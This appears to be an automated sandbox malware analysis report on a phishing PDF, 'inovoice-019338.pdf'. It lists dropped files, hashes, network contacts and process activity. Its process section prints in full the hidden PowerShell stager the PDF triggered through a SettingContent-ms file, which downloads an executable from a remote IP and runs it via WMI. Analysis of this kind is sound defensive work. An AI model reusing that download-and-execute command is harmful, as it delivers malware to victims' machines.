SHA-512:2CC7C4972879AD1D470613BF2848F61083551FED9EBB0EE9A58863C78212C60B439DAE25E1EEC261F8F17ED60B34AB9A57C33D2CD7A79166157E70FECE0302D6
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\user\AppData\Local\Adobe\Acrobat\11.0\UserCache.bin
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:data
Size (bytes):112386
Entropy (8bit):6.203395176669897
Encrypted:false
MD5:68F1A1D99706F3BEBE482066BE2B164B
SHA1:D2B189828BF90CC5DF11BD4567F4CBE7C279C171
SHA-256:DC8B0568F2D3CA4FBCE620223F0F0D2B7B833D9E107EBFCA84D814912AC1CACB
SHA-512:43E3723C7E3026E2AE8FA48A7B8AE560A2773D96E2733FCBF25A9CE8DC928F88C7DAF31EA96655588733332E5F29138A307EBC20DB2895DE19ACD7ABDFDD0968
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9R1e64yi0_96svy3_310.tmp\downl.SettingContent-ms
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:XML document text
Size (bytes):905
Entropy (8bit):5.440423866385781
Encrypted:false
MD5:4B9A44E062F445ACD68B2ED25E02B2D0
SHA1:E5955F64FD55F8B65332D75150120D8E6EFCF53B
SHA-256:7F70C9070A163050E2B7EB8DBE3414340616077561855D9092E2911AF99EEBBD
SHA-512:4EC2B5FD9DD65B56933F4988EEF8CB4A70019127AA36BE52DA62EC2CCCC8A3DE6F3210B1C3DEF718A622A28EA7D795F06E5E0808A6E79ED6E57C8CA12B191D24
Malicious:true
Reputation:low
C:\Users\user\AppData\Local\Temp\acrord32_sbx\FAP7AC9.tmp
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:ASCII text, with no line terminators
Size (bytes):4
Entropy (8bit):1.5
Encrypted:false
MD5:098F6BCD4621D373CADE4E832627B4F6
SHA1:A94A8FE5CCB19BA61C4C0873D391E987982FBBD3
SHA-256:9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08
SHA-512:EE26B0DD4AF7E749AA1A8EE3C10AE9923F618980772E473F8819A5D4940E0DB27AC185F8A0E1D5F84F88BC887FD67B143732C304CC5FA9AD8E6F57F50028A8FF
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\services_rdr.dat
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:data
Size (bytes):1561
Entropy (8bit):7.816467242618155
Encrypted:false
MD5:2D21655F74FFEC0B967B89E0FC5459CA
SHA1:2F12542054D62E92D8DC7D97E75F3699DC5AFEFF
SHA-256:3ACBC0BA7AAF3AB2DACC869F316B524E8A29238C5E46FD47AD2748BC832DADB7
SHA-512:E57C848D69DD2A4D4647CA1E216D88AF5C141952AFD6A2177EC0F2BFCBBECF3514416EA112C6D51C2C19B36C71459F1E9BF4653C96C0D2B3A0DD4DA2E3824C6C
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\services_rdri.dat
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:data
Size (bytes):4761
Entropy (8bit):7.960179023080062
Encrypted:false
MD5:D46751230F70D9A44DB8DB922A27747A
SHA1:F6004B48A777C6AA49513E5CE352CB2C979C8E85
SHA-256:F46C34FA32B6CC0F7E4FA274A03C1C9C7215A6464A7CC6C988DB3C1EA450CEE7
SHA-512:6EB4CC9045BD621E8E0A135D5072208E2F58F332AAD47144CE611BEF77BA225DC7AF24A463D4A72866668DE354FF67DEC84EA63F1BCDCE96F5293528AB144D25
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\services_rdrk.dat
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:data
Size (bytes):264
Entropy (8bit):6.439704084424354
Encrypted:false
MD5:CBCAD2CEDC8D745A6C200B9360677F00
SHA1:B9B61BC123E9A74836E62BC5A1494CDFD9FD09CF
SHA-256:A5A263076F7959F04345FB54D755CF832A1ED0DDA74913B1C6AE0EB40CC10C5F
SHA-512:A9B5D35A527508B86071D05FEA797285CF783752F7938968F8517E7E1346E7D1046A477C8A4BF861F81E85ACDCACDF1972618428FCADAF3B866EE9EB4D95ECCC
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RCS92RYDG92H2SP9X407.temp
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Size (bytes):8016
Entropy (8bit):3.5527386276805744
Encrypted:false
MD5:D70E49A43E503F40FFC22F06A8C9800E
SHA1:8890C91044705C4DA2F0B273325CFA7B94D335C2
SHA-256:62565743F6808D4B6A97B18A4F17974BB3C429C51040FDD7794C40AA9E186516
SHA-512:71C12CA57413BEF75F2FAAABEACDF8C4A9A108C3B7A9033E9563C00462EEF68AF84DE5B8B0C9FC719B5CEA6C7C16C3D5256085A5EF32C59D55857EC6062D6CBC
Malicious:false
Reputation:low
\AIPC_SRV\broker_pdfshell_sh5e4878b7-68be-4eb6-aa67-522db6d31230
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:data
Size (bytes):1036
Entropy (8bit):0.0
Encrypted:false
MD5:227FD460860A3AD1FD2B245793C07F95
SHA1:71D8DA21D4BB33F4CC32B70B174815E40EDA657E
SHA-256:693195CF289838146418E1BD05FD1A482C36FF75A77874609D615247285D5B99
SHA-512:CE035DBE02B8E15091F7FEE997A823DC4A0EF12C14E4F7D8441B9D3D9878BD17036DB61E24D4E67DB2A6E1F8B50168F6F03311B19713C688691CE4298B1DEB2C
Malicious:false
Reputation:moderate, very likely benign file
\AIPC_SRV\pdfshell_shb8a8b1dd-362e-4b05-997a-36eca3b1115a
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:FoxPro FPT, blocks size 0, next free block index 100663296
Size (bytes):5180
Entropy (8bit):0.028344400812028762
Encrypted:false
MD5:43926F7096372ADEFA37C068D6DB0536
SHA1:98576EEFE021F1B2A3D439CC0DB400BC5F606E54
SHA-256:5D322898C99C585ACFBA501BEACEB2252855C0070A1BE36B534F246231214E01
SHA-512:9F87F60A65E3959E1BE3A1C0DAEA72B99B8371925ABA0D0FC88667F81BED11291B91FBD9735AB46E77C5BF2939F46C65EE14FE66944DA3EB9BEB22351E118A41
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
files-weighted.r53.acrobat.com | 35.168.158.221 | true | false | 0%, virustotal | high

Contacted IPs

Public

IP | Country | ASN | ASN Name | Malicious
169.239.129.117 | Seychelles | 61138 | ZAPPIE-HOST-ASZappieHostGB | true
35.168.158.221 | United States | 14618 | AMAZON-AES-AmazoncomIncUS | false

Static File Info

General

File type:PDF document, version 1.4
Entropy (8bit):6.490971090883855
TrID:
  • Adobe Portable Document Format (5005/1) 100.00%
File name:inovoice-019338.pdf
File size:2333
MD5:2f7cec0f91a5fd23d706dc53a82b2db7
SHA1:162e98d89f2ae3b4b469b066ebfe02af22e9b869
SHA256:576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4
SHA512:7f4bfbc6c9b2617e56b2dd650d69022c3408c53e50a2bdca1ad4aac1306187d8d09772c36360a09e8f0c7fad9d72deb8e6ba849f9f2db2cc13d1c4ecb5955fb1
File Content Preview:%PDF-1.4.%.....1 0 obj.<</Length 508/Type/EmbeddedFile/Filter/FlateDecode/Params<</ModDate(D:20180712121742+03'00')/Size 905>>>>stream.x.}S.k.0..>.....3...N.&..R{aac....K).|..d.Xj.3..O.ARh.......N.....st.R1)B..c...2e.1.~.X9W.....`.mAk.U...-$%..=.H..B#.#Th

Static PDF Info

General

Header:%PDF-1.4
Total Entropy:6.490971
Total Bytes:2333
Stream Entropy:7.630218
Stream Bytes:721
Entropy outside Streams:5.181306
Bytes outside Streams:1612
Number of EOF found:1
Bytes after EOF:

Keywords Statistics

Name | Count
obj | 13
endobj | 13
stream | 3
endstream | 3
xref | 1
trailer | 1
startxref | 1
/Page | 1
/Encrypt | 0
/ObjStm | 0
/URI | 0
/JS | 2
/JavaScript | 3
/AA | 0
/OpenAction | 1
/AcroForm | 0
/JBIG2Decode | 0
/RichMedia | 0
/Launch | 0
/EmbeddedFile | 1

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 26, 2018 11:22:05.021764994 CEST | 63638 | 53 | 192.168.1.16 | 8.8.8.8
Jul 26, 2018 11:22:05.033562899 CEST | 53 | 63638 | 8.8.8.8 | 192.168.1.16
Jul 26, 2018 11:22:05.129484892 CEST | 49188 | 443 | 192.168.1.16 | 35.168.158.221
Jul 26, 2018 11:22:05.129544973 CEST | 443 | 49188 | 35.168.158.221 | 192.168.1.16
Jul 26, 2018 11:22:05.129627943 CEST | 49188 | 443 | 192.168.1.16 | 35.168.158.221
Jul 26, 2018 11:22:20.311645985 CEST | 49188 | 443 | 192.168.1.16 | 35.168.158.221

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 26, 2018 11:22:05.021764994 CEST | 63638 | 53 | 192.168.1.16 | 8.8.8.8
Jul 26, 2018 11:22:05.033562899 CEST | 53 | 63638 | 8.8.8.8 | 192.168.1.16

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 26, 2018 11:22:05.033562899 CEST | 8.8.8.8 | 192.168.1.16 | 0x1b5d | No error (0) | files-weighted.r53.acrobat.com | | 35.168.158.221 | A (IP address) | IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time:11:20:23
Start date:26/07/2018
Path:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
Wow64 process (32bit):false
Commandline:'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' /b /id 1480_8670 /if pdfshell_shb8a8b1dd-362e-4b05-997a-36eca3b1115a --shell-broker-channel=broker_pdfshell_sh5e4878b7-68be-4eb6-aa67-522db6d31230
Imagebase:0x1290000
File size:1544928 bytes
MD5 hash:513659580A49DF6A85CDFD869895924A
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:11:20:23
Start date:26/07/2018
Path:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
Wow64 process (32bit):false
Commandline:'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3816.0.959207006 --type=renderer --shell-broker-channel=broker_pdfshell_sh5e4878b7-68be-4eb6-aa67-522db6d31230 /b /id 1480_8670 /if pdfshell_shb8a8b1dd-362e-4b05-997a-36eca3b1115a
Imagebase:0x1290000
File size:1544928 bytes
MD5 hash:513659580A49DF6A85CDFD869895924A
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:11:20:23
Start date:26/07/2018
Path:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
Wow64 process (32bit):false
Commandline:'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\inovoice-019338.pdf'
Imagebase:0x1290000
File size:1544928 bytes
MD5 hash:513659580A49DF6A85CDFD869895924A
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:11:20:24
Start date:26/07/2018
Path:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
Wow64 process (32bit):false
Commandline:'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3876.0.283852601 --type=renderer 'C:\Users\user\Desktop\inovoice-019338.pdf'
Imagebase:0x1290000
File size:1544928 bytes
MD5 hash:513659580A49DF6A85CDFD869895924A
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:11:21:01
Start date:26/07/2018
Path:C:\Windows\System32\scmwrap.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\system32\scmwrap.exe' 'C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9R1e64yi0_96svy3_310.tmp\downl.SettingContent-ms'
Imagebase:0x860000
File size:20480 bytes
MD5 hash:5040C4CA9EE4965AD0BA8DAEE98A1885
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:low

General

Start time:11:21:05
Start date:26/07/2018
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\cmd.exe' /C Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Imagebase:0x49e40000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:11:21:06
Start date:26/07/2018
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Imagebase:0x227c0000
File size:452608 bytes
MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

Disassembly

Code Analysis

    Execution Graph

    Execution Coverage:15.4%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:100%
    Total number of Nodes:11
    Total number of Limit Nodes:0

    Graph

    Callgraph

    Executed Functions

    Memory Dump Source: 00000003.00000002.10722138841.003D8000.00000020.sdmp, Offset: 003D8000, based on PE: false
    Joe Sandbox IDA Plugin Snapshot File: hcaresult_3_2_3d8000_AcroRd32.jbxd

    Control-flow graphs (graph id: address range, API):
    • 0: 3d8000-3d801c NtCreateFile
    • 1: 3d8050-3d805c NtOpenFile
    • 2: 3d8090-3d809c NtQueryAttributesFile (API: NtQueryAttributesFile.NTDLL ref: 003D809A)
    • 3: 3d8110-3d811c NtSetInformationFile (API: NtSetInformationFile.NTDLL ref: 003D811A)
    • 4: 3d81d0-3d81dc NtCreateKey
    • 5: 3d8210-3d821c NtOpenKey
    • 6: 3d8250-3d825c NtOpenKeyEx
    • 7: 3d82d0-3d82dc NtCreateMutant
    • 8: 3d8310-3d831c NtCreateSection
    • 9: 3d8350-3d835c NtOpenSection
    • 10: 3d8690-3d869c NtMapViewOfSection

    Non-executed Functions

    Execution Graph

    Execution Coverage:15.4%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:100%
    Total number of Nodes:11
    Total number of Limit Nodes:0

    Graph

    Callgraph

    Executed Functions

    Memory Dump Source: 00000005.00000002.10864231780.00725000.00000020.sdmp, Offset: 00725000, based on PE: false
    Joe Sandbox IDA Plugin Snapshot File: hcaresult_5_2_725000_AcroRd32.jbxd

    Control-flow graphs (graph id: address range, API):
    • 0: 725000-72501c NtCreateFile
    • 1: 725050-72505c NtOpenFile
    • 2: 725090-72509c NtQueryAttributesFile (API: NtQueryAttributesFile.NTDLL ref: 0072509A)
    • 3: 725110-72511c NtSetInformationFile (API: NtSetInformationFile.NTDLL ref: 0072511A)
    • 4: 7251d0-7251dc NtCreateKey
    • 5: 725210-72521c NtOpenKey
    • 6: 725250-72525c NtOpenKeyEx
    • 7: 7252d0-7252dc NtCreateMutant
    • 8: 725310-72531c NtCreateSection
    • 9: 725350-72535c NtOpenSection
    • 10: 725690-72569c NtMapViewOfSection

    Non-executed Functions